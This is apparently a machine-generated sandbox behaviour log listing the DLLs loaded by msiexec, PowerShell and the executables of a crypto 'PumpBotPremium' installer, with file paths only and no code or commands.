Source: C:\Windows\System32\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srclient.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: spp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: python310.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: python3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: libcrypto-1_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: libssl-1_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: pywintypes310.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: libffi-7.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: tcl86t.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: tk86t.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mfplat.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mf.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mfreadwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mfcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: rtworkq.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
